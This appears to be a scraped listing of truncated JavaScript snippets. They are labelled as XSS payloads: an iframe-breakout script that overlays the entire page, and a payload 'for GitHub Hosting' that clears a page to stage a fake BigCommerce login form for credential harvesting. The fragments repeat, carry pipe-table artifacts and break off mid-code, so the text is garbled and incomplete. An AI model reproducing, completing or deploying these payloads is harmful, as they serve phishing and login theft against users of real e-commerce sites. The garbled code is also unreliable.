// Complete Iframe Breakout Script - Escapes nested iframes and covers entire page | |
(function() { | |
console.log('π Starting complete iframe breakout sequence...'); | |
// Function to create full-page overlay | |
function createFullPageOverlay(targetWindow, targetDocument) { | |
console.log('β Creating full-page overlay in target document'); | |
// Remove any existing overlays | |
try { |
// XSS Payload - Iframe Breakout with Full Screen Overlay | |
// This script breaks out of iframe constraints and creates a full-screen overlay | |
(function() { | |
// Function to create the overlay in the target window context | |
function createOverlay(targetWindow, targetDocument) { | |
// Create full-screen overlay iframe | |
var overlay = targetDocument.createElement('iframe'); | |
overlay.style.cssText = ` | |
position: fixed !important; |
// Complete Iframe Breakout Script - Escapes nested iframes and covers entire page | |
(function() { | |
console.log('π Starting complete iframe breakout sequence...'); | |
// Function to create full-page overlay | |
function createFullPageOverlay(targetWindow, targetDocument) { | |
console.log('β Creating full-page overlay in target document'); | |
// Remove any existing overlays | |
try { |
// XSS Payload for GitHub Hosting - BigCommerce Login Form with Credential Harvesting and Alert | |
// File: xss.js (to be hosted on GitHub Gist or Repository) | |
(function() { | |
// Clear everything immediately | |
document.body.innerHTML = ""; | |
document.head.innerHTML = ""; | |
// Remove all existing scripts | |
var scripts = document.getElementsByTagName('script'); |